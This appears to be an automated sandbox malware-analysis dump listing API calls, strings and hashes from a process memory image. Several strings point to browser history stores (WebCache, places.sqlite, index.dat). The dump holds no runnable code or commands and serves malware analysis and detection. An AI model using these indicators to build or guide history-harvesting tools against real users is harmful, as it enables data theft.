                                    • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                    APIs
                                    • memset.MSVCRT ref: 0040E60F
                                    • memset.MSVCRT ref: 0040E629
                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                    Strings
                                    • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                    • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                    • API String ID: 3354267031-2114579845
                                    • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                    • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                    • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                    • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                    APIs
                                    • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                    • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                    • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                    • LockResource.KERNEL32(00000000), ref: 004148EF
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Resource$FindLoadLockSizeof
                                    • String ID:
                                    • API String ID: 3473537107-0
                                    • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                    • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                    • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                    • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                    APIs
                                    Strings
                                    • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset
                                    • String ID: only a single result allowed for a SELECT that is part of an expression
                                    • API String ID: 2221118986-1725073988
                                    • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                    • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                    • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                    • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                    APIs
                                    • Sleep.KERNEL32(00000064), ref: 004175D0
                                    • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ChangeCloseFindNotificationSleep
                                    • String ID: }A
                                    • API String ID: 1821831730-2138825249
                                    • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                    • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                    • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                    • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??3@DeleteObject
                                    • String ID: r!A
                                    • API String ID: 1103273653-628097481
                                    • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                    • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                    • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                    • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??2@
                                    • String ID:
                                    • API String ID: 1033339047-0
                                    • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                    • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                    • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                    • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                    APIs
                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                    • memcmp.MSVCRT ref: 00444BA5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: AddressProc$memcmp
                                    • String ID: $$8
                                    • API String ID: 2808797137-435121686
                                    • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                    • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                    • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                    • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                    Strings
                                    • too many columns on %s, xrefs: 00430763
                                    • duplicate column name: %s, xrefs: 004307FE
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: duplicate column name: %s$too many columns on %s
                                    • API String ID: 0-1445880494
                                    • Opcode ID: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                    • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                    • Opcode Fuzzy Hash: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                    • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                    APIs
                                      • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                      • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                      • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                      • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                      • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                      • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                      • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                      • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                      • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                    • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                      • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                      • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                      • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                    • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                    • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                      • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                      • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                      • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                    • String ID:
                                    • API String ID: 1042154641-0
                                    • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                    • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                    • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                    • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                    APIs
                                      • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                      • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                      • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                    • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                    • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                    • String ID:
                                    • API String ID: 2947809556-0
                                    • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                    • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                    • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                    • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                    APIs
                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                    • memset.MSVCRT ref: 00403A55
                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                    • String ID: history.dat$places.sqlite
                                    • API String ID: 3093078384-467022611
                                    • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                    • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                    • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                    • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                    APIs
                                      • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                    • GetLastError.KERNEL32 ref: 00417627
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ErrorLast$File$PointerRead
                                    • String ID:
                                    • API String ID: 839530781-0
                                    • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                    • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                    • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                    • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: FileFindFirst
                                    • String ID: *.*$index.dat
                                    • API String ID: 1974802433-2863569691
                                    • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                    • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                    • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                    • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??3@mallocmemcpy
                                    • String ID:
                                    • API String ID: 3831604043-0
                                    • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                    • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                    • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                    • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                    APIs
                                    • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                    • GetLastError.KERNEL32 ref: 004175A2
                                    • GetLastError.KERNEL32 ref: 004175A8
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ErrorLast$FilePointer
                                    • String ID:
                                    • API String ID: 1156039329-0
                                    • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                    • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                    • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                    • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                    APIs
                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                    • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: File$ChangeCloseCreateFindNotificationTime
                                    • String ID:
                                    • API String ID: 1631957507-0
                                    • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                    • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                    • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                    • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                    APIs
                                    • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                    • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Temp$DirectoryFileNamePathWindows
                                    • String ID:
                                    • API String ID: 1125800050-0
                                    • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                    • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                    • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                    • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                    APIs
                                    Strings
                                    • failed memory resize %u to %u bytes, xrefs: 00415358
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: realloc
                                    • String ID: failed memory resize %u to %u bytes
                                    • API String ID: 471065373-2134078882
                                    • Opcode ID: e5ae129d454b891eada76ccbfa458d0a6592737a0e8831e28bd7d44ced5f0510
                                    • Instruction ID: af22f86c8d97814ed0bf188a45fefa7fc909daabc8cee38fca791e75313f3e85
                                    • Opcode Fuzzy Hash: e5ae129d454b891eada76ccbfa458d0a6592737a0e8831e28bd7d44ced5f0510
                                    • Instruction Fuzzy Hash: 49F027B3A01605A7D2109A55DC418CBF3DCDFC4655B06082FF998D3201E168E88083B6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: d
                                    • API String ID: 0-2564639436
                                    • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                    • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                    • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                    • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset
                                    • String ID: BINARY
                                    • API String ID: 2221118986-907554435
                                    • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                    • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                    • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                    • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                    APIs
                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                    • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                      • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                      • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                      • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                    • String ID:
                                    • API String ID: 1161345128-0
                                    • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                    • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                    • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                    • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: _wcsicmp
                                    • String ID: /stext
                                    • API String ID: 2081463915-3817206916
                                    • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                    • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                    • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                    • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                    APIs
                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                    • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                    • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                    • String ID:
                                    • API String ID: 159017214-0
                                    • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                    • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                    • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                    • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                    APIs
                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
